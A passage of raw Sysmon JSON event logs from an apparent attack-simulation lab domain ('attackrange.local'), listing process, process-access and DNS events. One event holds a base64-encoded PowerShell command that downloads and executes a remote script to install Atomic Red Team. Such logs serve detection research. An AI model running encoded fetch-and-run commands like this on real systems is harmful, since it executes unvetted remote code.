EM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.564","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4630,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:53.419\r\nProcessGuid: {41C8662E-20BC-5F25-0000-00104D890600}\r\nProcessId: 2608\r\nQueryName: onegetcdn.azureedge.net\r\nQueryStatus: 0\r\nQueryResults: type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:58:53.419","ProcessGuid":"{41C8662E-20BC-5F25-0000-00104D890600}","QueryName":"onegetcdn.azureedge.net","QueryStatus":"0","QueryResults":"type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4631,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.775\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BF-5F25-0000-0020C6C20600}\r\nLogonId: 0x6C2C6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20BF-5F25-0000-001075D20600}\r\nParentProcessId: 4152\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.775","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BF-5F25-0000-0020C6C20600}","LogonId":"0x6c2c6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20BF-5F25-0000-001075D20600}","ParentProcessId":"4152","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4632,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001075D20600}\r\nSourceProcessId: 4152\r\nSourceThreadId: 3424\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFD152F8890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.767","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001075D20600}","SourceProcessId":"4152","SourceThreadId":"3424","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-001025EA0600}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFD152F8890)","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4633,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.767","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20C0-5F25-0000-001025EA0600}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4634,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4635,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4636,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 